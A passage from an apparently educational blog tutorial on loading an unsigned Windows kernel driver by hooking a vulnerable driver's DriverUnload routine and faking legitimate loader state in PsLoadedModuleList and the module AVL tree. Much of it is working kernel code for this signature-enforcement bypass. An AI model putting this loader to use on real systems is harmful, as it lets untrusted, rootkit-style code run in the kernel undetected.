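    if ((infoMask & wanted) == 0)
    {
        return 0;
    }

    std::size_t stepback = 0;
    for (std::size_t i = 0; i < sizeof(kOptionalHeaderSizes) / sizeof(kOptionalHeaderSizes[0]); ++i)
    {
        const std::uint8_t bit = static_cast<std::uint8_t>(1u << i);
        if (bit > wanted)
        {
            break; // structures for higher bits sit further away than the one we want
        }
        if (infoMask & bit)
        {
            stepback += kOptionalHeaderSizes[i];
        }
    }
    return stepback;
}
```

For an object with both creator and name info (InfoMask 0x03) this gives 0x40 for the name info, which matches what ObGetObjectName computes by hand.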

Awesome! Now, given a pointer to an object, we can figure out both its name and its type! This is finally enough for us to walk the kernel object tree to find our device \Device\VulnerableDriver. From the root directory object we scan through all of the hash buckets until we find an object of type "Directory" with the name "Device". Then we crawl all of the hash buckets in the "Device" directory to look for an object of type "Device" with the name "VulnerableDriver"! Once we’ve finally found the object we’re looking for, because we know it’s a "Device" object, we know the structure pointed to by the object pointer is a DEVICE_OBJECT:

struct _DEVICE_OBJECT
{
    SHORT Type;                                                             //0x0
    USHORT Size;                                                            //0x2
    LONG ReferenceCount;                                                    //0x4
    struct _DRIVER_OBJECT* DriverObject;                                    //0x8
    struct _DEVICE_OBJECT* NextDevice;                                      //0x10
    struct _DEVICE_OBJECT* AttachedDevice;                                  //0x18
    struct _IRP* CurrentIrp;                                                //0x20
    struct _IO_TIMER* Timer;                                                //0x28
    ULONG Flags;                                                            //0x30
    ULONG Characteristics;                                                  //0x34
    struct _VPB* Vpb;                                                       //0x38
    VOID* DeviceExtension;                                                  //0x40
    ULONG DeviceType;                                                       //0x48
    CHAR StackSize;                                                         //0x4c
    union
    {
        struct _LIST_ENTRY ListEntry;                                       //0x50
        struct _WAIT_CONTEXT_BLOCK Wcb;                                     //0x50
    } Queue;                                                                //0x50
    ULONG AlignmentRequirement;                                             //0x98
    struct _KDEVICE_QUEUE DeviceQueue;                                      //0xa0
    struct _KDPC Dpc;                                                       //0xc8
    ULONG ActiveThreadCount;                                                //0x108
    VOID* SecurityDescriptor;                                               //0x110
    struct _KEVENT DeviceLock;                                              //0x118
    USHORT SectorSize;                                                      //0x130
    USHORT Spare1;                                                          //0x132
    struct _DEVOBJ_EXTENSION* DeviceObjectExtension;                        //0x138
    VOID* Reserved;                                                         //0x140
};

We can then finally follow the DriverObject pointer within this DEVICE_OBJECT structure et voila! We found the DRIVER_OBJECT structure for our vulnerable driver and we’re finally ready to patch in our hook to gain execution! Just for completeness, the DRIVER_OBJECT structure looks like this:

struct _DRIVER_OBJECT
{
    SHORT Type;                                                             //0x0
    SHORT Size;                                                             //0x2
    struct _DEVICE_OBJECT* DeviceObject;                                    //0x8
    ULONG Flags;                                                            //0x10
    VOID* DriverStart;                                                      //0x18
    ULONG DriverSize;                                                       //0x20
    VOID* DriverSection;                                                    //0x28
    struct _DRIVER_EXTENSION* DriverExtension;                              //0x30
    struct _UNICODE_STRING DriverName;                                      //0x38
    struct _UNICODE_STRING* HardwareDatabase;                               //0x48
    struct _FAST_IO_DISPATCH* FastIoDispatch;                               //0x50
    LONG(*DriverInit)(struct _DRIVER_OBJECT* arg1, struct _UNICODE_STRING* arg2); //0x58
    VOID(*DriverStartIo)(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2);  //0x60
    VOID(*DriverUnload)(struct _DRIVER_OBJECT* arg1);                      //0x68
    LONG(*MajorFunction[28])(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2); //0x70
};
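To make the pointer chasing concrete, here is a minimal sketch of the address arithmetic implied by the two structure dumps above. The helper names are hypothetical and the offsets are simply copied from the x64 listings, so treat them as assumptions that need re-checking against the exact kernel build you are targeting. IRP_MJ_DEVICE_CONTROL is 0x0e in wdm.h.

```cpp
#include <cassert>
#include <cstdint>

// Offsets taken from the x64 structure dumps above (assumed, verify per build)
constexpr std::uint64_t kDeviceObject_DriverObject  = 0x8;   // DEVICE_OBJECT::DriverObject
constexpr std::uint64_t kDriverObject_DriverUnload  = 0x68;  // DRIVER_OBJECT::DriverUnload
constexpr std::uint64_t kDriverObject_MajorFunction = 0x70;  // DRIVER_OBJECT::MajorFunction[0]
constexpr std::uint64_t kPointerSize                = 8;     // x64 pointer width
constexpr std::uint64_t kMajorFunctionCount         = 28;    // array length from the dump
constexpr std::uint64_t kIrpMjDeviceControl         = 0x0e;  // IRP_MJ_DEVICE_CONTROL

// Address of the field inside a DEVICE_OBJECT that holds the DRIVER_OBJECT pointer
constexpr std::uint64_t DriverObjectFieldAddress(std::uint64_t deviceObject)
{
    return deviceObject + kDeviceObject_DriverObject;
}

// Address of the DriverUnload function pointer slot inside a DRIVER_OBJECT
constexpr std::uint64_t DriverUnloadSlot(std::uint64_t driverObject)
{
    return driverObject + kDriverObject_DriverUnload;
}

// Address of the MajorFunction[irpMajor] function pointer slot inside a DRIVER_OBJECT
constexpr std::uint64_t MajorFunctionSlot(std::uint64_t driverObject, std::uint64_t irpMajor)
{
    assert(irpMajor < kMajorFunctionCount);
    return driverObject + kDriverObject_MajorFunction + irpMajor * kPointerSize;
}

// The IRP_MJ_DEVICE_CONTROL handler sits 0xe0 bytes into the DRIVER_OBJECT
static_assert(MajorFunctionSlot(0, kIrpMjDeviceControl) == 0xe0, "unexpected slot offset");
```

With the KernelPtr wrapper from the previous blog, these are the addresses you would read from and write to, rather than hard-coding the arithmetic at each call site.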

Gaining Execution By Patching the Driver Object

Just to recap, we’ve now managed to:

Map our unsigned driver into kernel mode
Fix up the mapped image’s relocations and imports
Find the address of the vulnerable driver’s DRIVER_OBJECT

The last step now is to turn this into execution cleanly. For the sake of this blog I will assume your vulnerable driver has a DriverUnload routine and can be unloaded. If not, you can simply change your code to hook the MajorFunction entry for IRP_MJ_DEVICE_CONTROL and then send an IOCTL to it. Okay, so we’re hooking the driver unload, what do we do? Well, we need an address in kernel to transfer execution to, and my personal preference is a function exported by the unsigned driver we just loaded. Why not point straight to the DriverEntry? Well, for one, the function we redirect execution to needs the same signature as the function we hooked, and additionally we’ll trigger a call to our DriverEntry later when we finish loading our driver from within kernel. Let’s assume then that you have a function in your unsigned driver exported as AlternateDriverEntry with a function signature like so:

extern "C" void AlternateDriverEntry(DRIVER_OBJECT * DriverObject)

We can now actually re-use our KGetProcAddress implementation to find the address of this function exported by your unsigned driver. We’re about to finally patch the vulnerable driver’s DriverUnload routine to point to AlternateDriverEntry, but we have one last issue: we need to tell our unsigned driver where the original routine is so that it can forward the call! The way I solved this was by using a driver data export (which we can also find using our KGetProcAddress implementation), into which we patch the original DriverUnload address:

extern "C" PDRIVER_UNLOAD Redirect = nullptr;

Finally our driver’s .def file should look something like:

EXPORTS
   AlternateDriverEntry
   Redirect
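The save-then-patch-then-forward idea can be modelled entirely in user mode, which is a handy way to sanity check the ordering before touching anything real. The sketch below uses a hypothetical FakeDriverObject and plain function pointers; none of these names come from the WDK, and nothing here touches kernel memory.

```cpp
#include <cassert>

// Hypothetical stand-in for DRIVER_OBJECT holding only the slot we care about
struct FakeDriverObject;
using UnloadRoutine = void (*)(FakeDriverObject*);

struct FakeDriverObject
{
    UnloadRoutine DriverUnload;
    int originalCalls;
    int hookCalls;
};

// Plays the role of the exported data slot described above
UnloadRoutine Redirect = nullptr;

// Plays the role of the vulnerable driver's real unload routine
void OriginalUnload(FakeDriverObject* obj)
{
    ++obj->originalCalls;
}

// Plays the role of AlternateDriverEntry: do our work, restore, then forward
void AlternateEntry(FakeDriverObject* obj)
{
    ++obj->hookCalls;
    obj->DriverUnload = Redirect;
    Redirect(obj);
}

// Record the original pointer BEFORE patching, so the hook can never run with an empty Redirect
void InstallHook(FakeDriverObject& obj)
{
    assert(obj.DriverUnload != nullptr);
    Redirect = obj.DriverUnload;
    obj.DriverUnload = AlternateEntry;
}
```

Calling InstallHook and then invoking obj.DriverUnload(&obj) runs the hook once, the original once, and leaves the slot pointing back at the original. The ordering inside InstallHook is the design choice worth copying: write the saved pointer first, patch the slot second.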

Okay, so we’ve patched the address of the original DriverUnload routine into the Redirect data export and we’ve modified the DRIVER_OBJECT so that the DriverUnload field now points to our exported function AlternateDriverEntry. Let’s trigger the execution!!

Wait, how do we trigger the driver unload? By stopping the service that represents the driver! So we make a call to ControlService to send the SERVICE_CONTROL_STOP code to stop the service backing our vulnerable driver and the DriverUnload routine will be executed! So what do we do now?

extern "C" void AlternateDriverEntry(DRIVER_OBJECT * DriverObject)
{
    /*
        Okay, so we've gained execution in kernel in the hooked DriverUnload but we
        need to forward the call so that the vulnerable driver is allowed to unload.
        The easiest thing to do here is just create an additional thread to set up
        a call to our unsigned driver's DriverEntry routine like a normal driver would
        get.
    */
    HANDLE hThread = NULL;
    NTSTATUS status = PsCreateSystemThread(&hThread, 0, NULL, NULL, NULL, SetupLegitDriverEntry, NULL);

    if (NT_SUCCESS(status))
    {
        // The thread keeps running without the handle, so close it to avoid leaking it
        ZwClose(hThread);
    }

    // Now that we have started a thread to run our own code let's forward to the original unload routine

    // Not sure this matters now but let's restore the original value anyway
    DriverObject->DriverUnload = Redirect;

    // Forward execution to the driver unload routine we hooked
    Redirect(DriverObject);
}

And there we have it!!!!! We finally have execution in kernel in our unsigned driver!!! As you can probably tell from the length of this blog however, we’re sadly not done yet. We haven’t been properly loaded in the same way a legitimate driver would have been and we want to get as close to that as possible, so let’s use our kernel execution to try and set up a legitimate call to our unsigned driver’s DriverEntry routine! I promise you we are incredibly close!!

Sadly it turns out we need some additional private symbols to finish the load in kernel, so again we’ll resort to the same setup we used in user-mode of hashing ntoskrnl.exe and then using that hash to look up a structure in our offset table. Now, you’d think hashing a file in kernel is difficult but all of the BCrypt APIs are actually available in kernel from cng.sys! So just add cng.lib to your driver’s linker settings and we can hash a file in kernel as follows:

...
UNICODE_STRING kernelPath = RTL_CONSTANT_STRING(L"\\??\\C:\\Windows\\System32\\ntoskrnl.exe");
UNICODE_STRING hash = HashFile(kernelPath);
...

UNICODE_STRING HashFile(UNICODE_STRING& path)
{
    UNICODE_STRING retval{};

    BCRYPT_ALG_HANDLE hAlg = NULL;

    NTSTATUS status = BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_SHA256_ALGORITHM, NULL, 0);

    if (STATUS_SUCCESS == status)
    {
        DWORD32 objLength = 0;
        ULONG bytesWritten = 0;

        status = BCryptGetProperty(hAlg, BCRYPT_OBJECT_LENGTH, reinterpret_cast<PUCHAR>(&objLength), sizeof(objLength), &bytesWritten, 0);

        if (STATUS_SUCCESS == status && bytesWritten == sizeof(objLength) && 0 != objLength)
        {
            void* pFileBuffer = malloc(1'000'000);
            void* pHashBuffer = malloc(objLength);

            if (nullptr != pFileBuffer && nullptr != pHashBuffer)
            {
                DWORD32 hashLength = 0;
                bytesWritten = 0;

                status = BCryptGetProperty(hAlg, BCRYPT_HASH_LENGTH, reinterpret_cast<PUCHAR>(&hashLength), sizeof(hashLength), &bytesWritten, 0);

                if (STATUS_SUCCESS == status && bytesWritten == sizeof(hashLength) && 0 != hashLength)
                {
                    void* pHash = malloc(hashLength);

                    if (nullptr != pHash)
                    {
                        BCRYPT_HASH_HANDLE hHash = NULL;

                        status = BCryptCreateHash(hAlg, &hHash, reinterpret_cast<PUCHAR>(pHashBuffer), objLength, NULL, 0, 0);

                        if (STATUS_SUCCESS == status && NULL != hHash)
                        {

                            HANDLE hFile{};
                            OBJECT_ATTRIBUTES objAttrs{};
                            InitializeObjectAttributes(&objAttrs, &path, OBJ_CASE_INSENSITIVE, NULL, NULL);

                            IO_STATUS_BLOCK ioStatusBlock{};

                            status = ZwOpenFile(&hFile, GENERIC_READ, &objAttrs, &ioStatusBlock, FILE_SHARE_READ, FILE_SYNCHRONOUS_IO_NONALERT);

                            if (STATUS_SUCCESS == status && NULL != hFile)
                            {
                                status = ZwReadFile(hFile, NULL, NULL, NULL, &ioStatusBlock, pFileBuffer, 1'000'000, NULL, NULL);

                                size_t bytesRead = ioStatusBlock.Information;

                                while (bytesRead != 0 && STATUS_SUCCESS == status)
                                {
                                    // Hash data
                                    status = BCryptHashData(hHash, reinterpret_cast<PUCHAR>(pFileBuffer), static_cast<ULONG>(bytesRead), 0);

                                    if (STATUS_SUCCESS != status)
                                    {
                                        // Stop here so the next read can't overwrite a hashing failure
                                        break;
                                    }

                                    // Get next chunk
                                    status = ZwReadFile(hFile, NULL, NULL, NULL, &ioStatusBlock, pFileBuffer, 1'000'000, NULL, NULL);
                                    bytesRead = ioStatusBlock.Information;
                                }

                                if (STATUS_END_OF_FILE == status)
                                {
                                    // Successfully hashed all chunks
                                    status = BCryptFinishHash(hHash, reinterpret_cast<PUCHAR>(pHash), hashLength, 0);

                                    if (STATUS_SUCCESS == status)
                                    {
                                        retval = Binary2Hex(pHash, hashLength);
                                    }
                                }
                                else
                                {
                                    DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, "Failed a read or hash update: 0x%08X\n", status);
                                }

                                // We're done with the file so close the handle rather than leaking it
                                ZwClose(hFile);
                            }
                            else
                            {
                                DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, "Failed to open file");
                            }

                            BCryptDestroyHash(hHash);
                        }
                        else
                        {
                            DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, "Failed to create hash object");
                        }

                        free(pHash);
                    }
                    else
                    {
                        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, "Failed hash allocate");
                    }
                }
            }
            else
            {
                DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, "Failed allocate");
            }

            if (pFileBuffer != nullptr)
            {
                free(pFileBuffer);
            }
            if (pHashBuffer != nullptr)
            {
                free(pHashBuffer);
            }
        }
        else
        {
            DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, "Failed to get property");
        }

        BCryptCloseAlgorithmProvider(hAlg, 0);
    }
    else
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, "Failed to open algorithm provider");
    }

    return retval;
}

You’ll notice a few oddities in the code above:

1. We use malloc and free which don’t exist in the kernel
2. The function Binary2Hex also doesn’t exist

In response to 1. I’ve actually written my own CRT-like & STL-like functions and classes as a kernel mode driver library, so if you’d like to see a blog post about that then please let me know. For now, here are the implementations of malloc and free:

// We default to allocating memory for people from the PAGED pool but allow them to override it
void* __cdecl malloc(size_t const size, POOL_FLAGS flags = POOL_FLAG_PAGED);

void* __cdecl malloc(size_t const size, POOL_FLAGS flags)
{
    void* block = ExAllocatePool2(flags, size, 'xxxx');

    return block;
}

void __cdecl free(void* const block)
{
    if (nullptr != block)
    {
        ExFreePool(block);
    }
}

In response to 2. I manually implemented the conversion of binary data to hex:

UNICODE_STRING Binary2Hex(void* data, size_t len)
{
    UNICODE_STRING retval{};

    // 2 wchars for each byte of data and 2 bytes for each wchar hence * 2 * 2
    // Then + 2 for null term
    size_t shaStringBytes = (len * 2 * 2) + 2;

    // Allocate result buffer with a null term
    wchar_t* pResult = reinterpret_cast<wchar_t*>(malloc(shaStringBytes));

    if (nullptr != pResult)
    {
        static wchar_t syms[] = L"0123456789abcdef";

        UCHAR* pBinaryData = reinterpret_cast<UCHAR*>(data);

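        for (size_t i = 0; i < len; i++)
        {
            pResult[2 * i] = syms[(pBinaryData[i] >> 4) & 0xF];
            pResult[2 * i + 1] = syms[pBinaryData[i] & 0xF];
        }

        // ExAllocatePool2 zeroes the allocation, but terminate explicitly so we don't rely on that
        pResult[2 * len] = L'\0';

        // Note: the caller owns Buffer and must free it when finished with the string
        retval.Buffer = pResult;
        retval.MaximumLength = static_cast<USHORT>(shaStringBytes);
        retval.Length = static_cast<USHORT>(shaStringBytes - 2);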
    }

    return retval;
}
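If you want to check the nibble logic outside the kernel first, the same conversion is easy to reproduce in portable C++. This is a minimal sketch using std::wstring instead of UNICODE_STRING; BytesToHex is a hypothetical name and isn’t part of the driver.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <string>

// Convert a byte buffer to a lowercase hex string, two characters per byte
std::wstring BytesToHex(const std::uint8_t* data, std::size_t len)
{
    assert(data != nullptr || len == 0);

    static const wchar_t syms[] = L"0123456789abcdef";

    std::wstring out;
    out.reserve(len * 2);

    for (std::size_t i = 0; i < len; ++i)
    {
        out.push_back(syms[(data[i] >> 4) & 0xF]);  // high nibble first
        out.push_back(syms[data[i] & 0xF]);         // then the low nibble
    }

    return out;
}
```

Feeding it the bytes 0x57, 0x88, 0xef produces L"5788ef", matching the lowercase format used for the table keys.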

So now that we can hash ntoskrnl, how can we do a lookup to find our offset structure for this hash? My custom STL-like kernel library does actually include a primitive version of a map, so again if you want to see that let me know, but for now let’s use this:

KernelOffset LookupKernel(UNICODE_STRING hash)
{
    KernelOffset retval{};

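    // HashFile returns an empty UNICODE_STRING on failure, so guard against a null buffer.
    // RTL_NUMBER_OF is the WDK's array-length macro.
    for (size_t i = 0; nullptr != hash.Buffer && i < RTL_NUMBER_OF(_KernelOffsets); i++)
    {
        if (0 == _wcsicmp(hash.Buffer, _KernelOffsets[i].kernelSha256))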
        {
            retval = _KernelOffsets[i].offsets;
            break;
        }
    }

    return retval;
}

Where:

struct KernelOffsetMap
{
    wchar_t kernelSha256[65];
    KernelOffset offsets;
};

constexpr KernelOffsetMap _KernelOffsets[] =
{
    {
        .kernelSha256 = L"5788ef18e2cdbc8bdddf1ddfaf2975652df18c469e11db0d51c98970e6c4636e",
        .offsets =
        {
            ...
        }
    },
    ...
};

The constexpr is key here because in kernel there is no CRT to initialize globals (unless you implement a kernel CRT 😉). Declaring the array constexpr means it is evaluated and populated at compile time, so the data is already present in the built driver and no runtime initialization is required. Okay, so what private symbols do we need for kernel? It turns out only a few!

struct KernelOffset
{
    // Called RtlInsertInvertedFunctionTable in the ntoskrnl.exe symbols
    DWORD32 rvaRtlInsertInvertedFunctionTable;
    
    /*
        Unnamed in symbols, referenced by function MiLookupDataTableEntry.
        Look for reference to data section after call to ExAcquireResourceSharedLite
    */
    DWORD32 rvaAvlTreeRoot;
};
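Putting the lookup pieces together, here is a small portable sketch of a compile-time table plus a lookup that can report a miss. The table keys and RVA values are placeholders I made up purely for illustration (they are not real hashes or offsets), and the names Offsets, OffsetEntry and LookupOffsets are hypothetical.

```cpp
#include <cstddef>
#include <cstdint>
#include <cwctype>

struct Offsets
{
    std::uint32_t rvaFirst;
    std::uint32_t rvaSecond;
};

struct OffsetEntry
{
    const wchar_t* key;   // would be the SHA-256 hex string of the kernel image
    Offsets offsets;
};

// constexpr means the table is baked into the binary, no runtime initializer needed
constexpr OffsetEntry kTable[] =
{
    { L"placeholder-hash-one", { 0x1000, 0x2000 } },  // placeholder values only
    { L"placeholder-hash-two", { 0x3000, 0x4000 } },  // placeholder values only
};

// Proof that the data really is available at compile time
static_assert(kTable[1].offsets.rvaSecond == 0x4000, "table not constant-initialized");

// Case-insensitive comparison of two null-terminated wide strings
bool EqualsIgnoreCaseW(const wchar_t* a, const wchar_t* b)
{
    while (*a != L'\0' && *b != L'\0')
    {
        if (std::towlower(static_cast<std::wint_t>(*a)) != std::towlower(static_cast<std::wint_t>(*b)))
        {
            return false;
        }
        ++a;
        ++b;
    }
    return *a == *b;
}

// Returns nullptr on a miss so callers can't mistake "not found" for all-zero offsets
const Offsets* LookupOffsets(const wchar_t* key)
{
    if (key == nullptr)
    {
        return nullptr;
    }

    for (std::size_t i = 0; i < sizeof(kTable) / sizeof(kTable[0]); ++i)
    {
        if (EqualsIgnoreCaseW(key, kTable[i].key))
        {
            return &kTable[i].offsets;
        }
    }

    return nullptr;
}
```

Returning a pointer rather than a zeroed structure is a deliberate choice in this sketch: an RVA of zero is indistinguishable from a miss, and calling through a bad offset in kernel is an instant bugcheck, so erroring out early on an unknown kernel is much safer.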

We need the RVA in ntoskrnl for the function RtlInsertInvertedFunctionTable. Actually, this step is only required if your driver wants to make use of SEH exceptions, however I’m including it for completeness. We also need an RVA for the pointer to an AvlTreeRoot. This is the root of an AVL tree which contains nodes representing all of the modules loaded in kernel, and some Windows APIs use it to verify the integrity of an address, e.g. in the PsSetCreateProcessNotifyRoutine* functions Windows checks that the provided callback falls within a loaded kernel module. This stops shellcode and unloaded/unlinked drivers from receiving callbacks. Okay, so we have our two private symbols, let’s get to work!

First we’ll deal with registering our unsigned driver’s exception data to enable SEH exceptions:

// Grab a pointer to ntoskrnl's base address
void* pNtosBase = get_module_address("ntoskrnl.exe");   

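// Look up the offsets for this kernel build. Note _KernelOffsets is the whole lookup table,
// so we need the single KernelOffset entry returned by LookupKernel for the hash we computed
KernelOffset offsets = LookupKernel(hash);

// Calculate location of RtlInsertInvertedFunctionTable from offsets structure
fnRtlInsertInvertedFunctionTable pfnRtlInsertInvertedFunctionTable = reinterpret_cast<fnRtlInsertInvertedFunctionTable>(reinterpret_cast<char*>(pNtosBase) + offsets.rvaRtlInsertInvertedFunctionTable);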

// Grab our image size
IMAGE_DOS_HEADER* pDosHeader = reinterpret_cast<IMAGE_DOS_HEADER*>(&__ImageBase);
IMAGE_NT_HEADERS* pNtHeader = reinterpret_cast<IMAGE_NT_HEADERS*>(reinterpret_cast<UCHAR*>(&__ImageBase) + pDosHeader->e_lfanew);

// Call RtlInsertInvertedFunctionTable 
pfnRtlInsertInvertedFunctionTable(&__ImageBase, pNtHeader->OptionalHeader.SizeOfImage);

Where __ImageBase is a special pseudo-variable provided by the MSVC linker, you can read about it here but we just have to define:

extern "C" VOID * __ImageBase;
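For anyone unfamiliar with the header walk used to grab SizeOfImage, here is a minimal portable sketch that does the same thing against a raw byte buffer with bounds checks. ReadSizeOfImage is a hypothetical helper, and it assumes a little-endian host. The offsets come from the PE format: e_lfanew lives at 0x3C in the DOS header, and SizeOfImage sits 56 bytes into the optional header for both PE32 and PE32+.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>

// Returns SizeOfImage from a PE image in memory, or 0 if the headers look malformed
std::uint32_t ReadSizeOfImage(const std::uint8_t* image, std::size_t size)
{
    constexpr std::size_t kLfanewOffset = 0x3C;
    // 4 byte "PE\0\0" signature + 20 byte file header + 56 bytes into the optional header
    constexpr std::size_t kSizeOfImageOffset = 4 + 20 + 56;

    if (image == nullptr || size < kLfanewOffset + sizeof(std::uint32_t))
    {
        return 0;
    }

    // DOS header magic
    if (image[0] != 'M' || image[1] != 'Z')
    {
        return 0;
    }

    std::uint32_t lfanew = 0;
    std::memcpy(&lfanew, image + kLfanewOffset, sizeof(lfanew));

    // Make sure the NT headers (up to and including SizeOfImage) fit in the buffer
    if (lfanew > size || size - lfanew < kSizeOfImageOffset + sizeof(std::uint32_t))
    {
        return 0;
    }

    // NT header signature
    if (std::memcmp(image + lfanew, "PE\0\0", 4) != 0)
    {
        return 0;
    }

    std::uint32_t sizeOfImage = 0;
    std::memcpy(&sizeOfImage, image + lfanew + kSizeOfImageOffset, sizeof(sizeOfImage));
    return sizeOfImage;
}
```

Inside the driver the image is already mapped and trusted, so the casts shown earlier are enough. The checks here matter more on the user-mode side, where the buffer is an arbitrary file read from disk.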

And we have implemented get_module_address like so, which you may notice looks very similar to our KGetModuleHandle we implemented in user-mode:

void* get_module_address(const char* name)
{
    void* retval = nullptr;

    ULONG returnLength = 0;

    ULONG bufferSize = 10;
    void* buffer = ExAllocatePool2(POOL_FLAG_PAGED, bufferSize, 'xxxx');

    if (nullptr == buffer)
    {
        return nullptr;
    }

    NTSTATUS status = ZwQuerySystemInformation(SystemModuleInformation, buffer, bufferSize, &returnLength);

    while (STATUS_INFO_LENGTH_MISMATCH == status)
    {
        // Free the old buffer
        ExFreePool(buffer);

        // Allocate the newer bigger one
        bufferSize = returnLength;
        returnLength = 0;
        buffer = ExAllocatePool2(POOL_FLAG_PAGED, bufferSize, 'xxxx');

        if (nullptr == buffer)
        {
            // Out of memory and there's nothing left to free, so bail out
            return nullptr;
        }

        // Try again
        status = ZwQuerySystemInformation(SystemModuleInformation, buffer, bufferSize, &returnLength);
    }

    if (NT_SUCCESS(status))
    {
        RTL_PROCESS_MODULES* pModules = reinterpret_cast<RTL_PROCESS_MODULES*>(buffer);

        for (ULONG i = 0; i < pModules->NumberOfModules; i++)
        {
            if (0 == _stricmp(name, reinterpret_cast<char*>(&pModules->Modules[i].FullPathName[0]) + pModules->Modules[i].OffsetToFileName))
            {
                retval = pModules->Modules[i].ImageBase;
                break;
            }
            
        }
    }

    ExFreePool(buffer);

    return retval;
}

It turns out the API ZwQuerySystemInformation also exists in kernel and also allows us to query modules loaded in kernel. It returns an identical set of structures to the user-mode API:

typedef struct _RTL_PROCESS_MODULES
{
    ULONG NumberOfModules;
    RTL_PROCESS_MODULE_INFORMATION Modules[1];
} RTL_PROCESS_MODULES, * PRTL_PROCESS_MODULES;

Where the information we get for each module is:

typedef struct _RTL_PROCESS_MODULE_INFORMATION
{
    HANDLE Section;
    PVOID MappedBase;
    PVOID ImageBase;
    ULONG ImageSize;
    ULONG Flags;
    USHORT LoadOrderIndex;
    USHORT InitOrderIndex;
    USHORT LoadCount;
    USHORT OffsetToFileName;
    UCHAR FullPathName[256];
} RTL_PROCESS_MODULE_INFORMATION, * PRTL_PROCESS_MODULE_INFORMATION;

Which handily allows us to find the address of any kernel module from within kernel too!
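The matching logic itself is worth seeing in isolation, since the OffsetToFileName trick is easy to get wrong. Below is a minimal user-mode model: ModuleInfo is a cut-down, hypothetical mirror of RTL_PROCESS_MODULE_INFORMATION, and MakeModule exists only so the example can build test data.

```cpp
#include <cctype>
#include <cstdint>
#include <cstring>
#include <vector>

// Cut-down mirror of the fields the lookup actually uses
struct ModuleInfo
{
    std::uint64_t ImageBase;
    std::uint16_t OffsetToFileName;
    char FullPathName[256];
};

// Case-insensitive comparison of two null-terminated strings
bool EqualsIgnoreCaseA(const char* a, const char* b)
{
    while (*a != '\0' && *b != '\0')
    {
        if (std::tolower(static_cast<unsigned char>(*a)) != std::tolower(static_cast<unsigned char>(*b)))
        {
            return false;
        }
        ++a;
        ++b;
    }
    return *a == *b;
}

// Build an entry the way the kernel reports it: full path plus offset of the file name part
ModuleInfo MakeModule(std::uint64_t base, const char* path)
{
    ModuleInfo m{};
    m.ImageBase = base;
    std::strncpy(m.FullPathName, path, sizeof(m.FullPathName) - 1);
    const char* slash = std::strrchr(m.FullPathName, '\\');
    m.OffsetToFileName = (slash != nullptr) ? static_cast<std::uint16_t>(slash - m.FullPathName + 1) : 0;
    return m;
}

// Returns the image base of the first module whose file name matches, or 0 if none does
std::uint64_t FindModuleBase(const std::vector<ModuleInfo>& modules, const char* name)
{
    for (const ModuleInfo& m : modules)
    {
        if (m.OffsetToFileName >= sizeof(m.FullPathName))
        {
            continue;  // malformed entry, don't index past the array
        }

        if (EqualsIgnoreCaseA(name, m.FullPathName + m.OffsetToFileName))
        {
            return m.ImageBase;
        }
    }

    return 0;
}
```

Comparing only the file name portion means callers can pass "ntoskrnl.exe" without caring whether the kernel reports the path with a \SystemRoot\ prefix or a full drive path.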

Right, I promise you that we’re on the final straight now! The last few steps are just to add ourselves into some structures to enable some Windows APIs to see us as a valid and loaded driver.

Step 1: Insert ourselves into the PsLoadedModuleList.

Step 2: Insert ourselves into the AVL tree that indexes the same loaded modules represented by the PsLoadedModuleList. This is just a more optimized structure for searching modules that is used by some of the newer Windows APIs.

For the call to IoCreateDriver, which will trigger a call to our DriverEntry routine, we must have a corresponding entry in the PsLoadedModuleList. This is a doubly linked list of KLDR_DATA_TABLE_ENTRY structures representing all of the loaded kernel drivers. The structure looks something like:

struct _KLDR_DATA_TABLE_ENTRY
{
    struct _LIST_ENTRY InLoadOrderLinks;                                    //0x0
    VOID* ExceptionTable;                                                   //0x10
    ULONG ExceptionTableSize;                                               //0x18
    VOID* GpValue;                                                          //0x20
    struct _NON_PAGED_DEBUG_INFO* NonPagedDebugInfo;                        //0x28
    VOID* DllBase;                                                          //0x30
    VOID* EntryPoint;                                                       //0x38
    ULONG SizeOfImage;                                                      //0x40
    struct _UNICODE_STRING FullDllName;                                     //0x48
    struct _UNICODE_STRING BaseDllName;                                     //0x58
    ULONG Flags;                                                            //0x68
    USHORT LoadCount;                                                       //0x6c
    union
    {
        USHORT SignatureLevel : 4;                                            //0x6e
        USHORT SignatureType : 3;                                             //0x6e
        USHORT Frozen : 2;                                                    //0x6e
        USHORT HotPatch : 1;                                                  //0x6e
        USHORT Unused : 6;                                                    //0x6e
        USHORT EntireField;                                                 //0x6e
    } u1;                                                                   //0x6e
    VOID* SectionPointer;                                                   //0x70
    ULONG CheckSum;                                                         //0x78
    ULONG CoverageSectionSize;                                              //0x7c
    VOID* CoverageSection;                                                  //0x80
    VOID* LoadedImports;                                                    //0x88
    union
    {
        VOID* Spare;                                                        //0x90
        struct _KLDR_DATA_TABLE_ENTRY* NtDataTableEntry;                    //0x90
    };
    ULONG SizeOfImageNotRounded;                                            //0x98
    ULONG TimeDateStamp;                                                    //0x9c
    // 0xA0
    /*
        Later on we need to insert ourselves into an AVL tree
        and from what I can tell the node structure should be
        allocated in the same memory block as this KLDR structure.
        Based on the function which uses the AVL tree
        MiLookupDataTableEntry it looks like there should be
        an RTL_BALANCED_NODE structure at offset 0xE8 but this
        isn't present in the private symbols (the structure
        is only 0xA0 bytes long). So we manually extend this
        struct to have a node at the correct location
    */
    VOID* unknown[9];
    _RTL_BALANCED_NODE atlNode;
};
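Since the padding above is hand-rolled, it’s worth letting the compiler confirm the node really lands at 0xE8. Here is a minimal sketch that mirrors the layout with fixed-width types so it compiles anywhere with 8-byte alignment for 64-bit integers. The mirror type names are hypothetical and the offsets are the ones from the dump above, which may differ between Windows builds.

```cpp
#include <cstddef>
#include <cstdint>

struct ListEntry64     { std::uint64_t Flink; std::uint64_t Blink; };                                  // 0x10 bytes
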